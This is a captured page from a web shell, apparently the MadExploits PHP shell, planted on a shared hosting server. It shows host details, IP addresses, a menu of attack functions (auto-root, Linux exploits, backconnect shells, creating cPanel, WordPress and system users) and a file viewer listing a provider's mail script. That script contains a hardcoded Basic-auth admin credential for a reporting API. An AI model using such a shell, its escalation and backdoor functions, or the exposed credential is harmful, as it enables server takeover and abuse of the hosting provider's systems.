Linux musi.iixcp.rumahweb.net 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
LiteSpeed
: 103.247.9.165 | : 216.73.216.132
Cant Read [ /etc/named.conf ]
7.4.33
pliq4844
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
rwmail /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
rwmail
898
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rwmail
#!/bin/bash while [[ $# -gt 0 ]] do key="$1" case $key in -s) SUBJECT="$2" shift # past argument shift # past value ;; *) # unknown option EMAIL=("$1") # save it in an array for later shift # past argument ;; esac done cat /dev/null > /tmp/rwmail-content.txt while read LINE; do echo $LINE >> /tmp/rwmail-content.txt done < /dev/stdin CONTENT=`cat /tmp/rwmail-content.txt | base64 | tr -d '\n'` generate_post_data() { cat <<EOF { "subject" : "$SUBJECT", "content" : "$CONTENT", "target" : "$EMAIL" } EOF } echo "$(generate_post_data)" > /tmp/rwmail.txt curl --request POST \ --proxy 103.253.214.197:8888 \ --url http://report.srs-x.com/api/email/noc \ --header 'Authorization: Basic YWRtaW5AcnVtYWh3ZWIuY29tOnNHQCE1ZTQlaG01UlNeI3o=' \ --header 'content-type: application/json' \ --data "$(generate_post_data)" >> /tmp/rwmail.txt
Close